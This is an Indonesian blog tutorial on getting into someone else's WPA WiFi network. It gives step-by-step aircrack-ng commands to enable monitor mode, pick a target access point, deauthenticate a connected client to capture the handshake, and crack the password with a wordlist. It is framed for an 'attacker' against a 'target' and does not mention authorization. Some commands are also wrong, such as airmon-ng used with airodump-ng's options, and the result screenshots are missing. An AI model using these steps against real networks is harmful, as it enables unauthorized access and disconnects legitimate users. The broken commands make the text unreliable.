Tutorial ini menjelaskan bagaimana cara mendapatkan password WiFi.
 Note:
 Tutorial ini dibuat di OS Back|Track 5 32 GNOME, dan juga bisa berjalan pada OS berbasis UNIX lainnya.
 Preparation:
 1. Aircrack, bisa di dapatkan di sini
 2. Dictionary attack
 Briefing
 1. Hentikan semua proses yang menghambat jalannya aireplay
 2. Simpan hasil monitoring
 3. Lakukan aireplay untuk mendapatkan WPA Handshake
 4. Crack hasil rekaman dengan dictionary attack
 1. Hentikan semua proses yang menghambat jalannya aireplay
 code:
 root@red-dragon:/# airmon-ng check kill
 2. Buat interface baru dengan mode monitor menggunakan airmon-ng
 code:
 root@red-dragon:/# airmon-ng start wlan0
 3. Monitoring setiap akses poin yang ada di sekitar attacker
 code:
 root@red-dragon:/# airodump-ng mon0
 4. Pilih target, kemudian Monitoring dan simpan hasil monitoring airodump.
 code:
 root@red-dragon:/# airmon-ng --write output --channel 6 --bssid 58:6D:8F:3D:55:E8 mon0
 Keterangan:
 1. --write : berfungsi untuk menyimpan hasil monitoring
 2. output : nama hasil monitoring yang di simpan [bisa diisi bebas]
 3. --chanel : channel akses poin target
 4. --bssid : mac address akses poin
 5. Jalankan aireplay-ng untuk mendapatkan WPA Handshake
 code:
 root@red-dragon:/# aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c E0:B9:A5:9D:18:94 mon0
 Keterangan:
 1. --deauth : berfungsi untuk deautentikasi setiap stasiun pada akses sebuah jaringan
 2. -a : mac address akses poin
 3. -c : mac address klien
 Note:
 Jika belum muncul WPA handshake, ganti mac address klien dengan yang lain.
 code:
 root@red-dragon:/# aireplay-ng --deauth 1 -a 58:6D:8F:3D:55:E8 -c 58:6D:8F:3D:55:E8 mon0
 Jika aireplay berhasil, maka akan tampak seperti ini:
 6. Jika sudah mendapatkan WPA handshake  dari klien, langkah selanjutnya adalah menghentikan proses airodump-ng  dengan menekan tombol ctrl + c, dan cracking password dengan  aircrack-ng.
 code:
 root@red-dragon:/# aircrack-ng output-01.cap -w /root/crack wpa.txt
 Keterangan
 1. output-01.cap harus disesuaikan dengan nama hasil monitoring yang anda kehendaki pada tahap 4
 2. -w adalah metode dictionary, diikuti dengan direktori dictionary milik anda.
 Setelah selesai, maka akan tampak seperti ini:
 7. Langkah selanjutnya adalah mengetes kebenaran dari metode ini
 Jika berhasil, maka:





 
 
0 komentar:
Posting Komentar